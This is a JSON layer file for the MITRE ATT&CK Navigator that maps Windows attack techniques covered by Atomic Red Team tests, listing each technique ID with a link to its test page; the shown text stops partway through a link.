-{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/a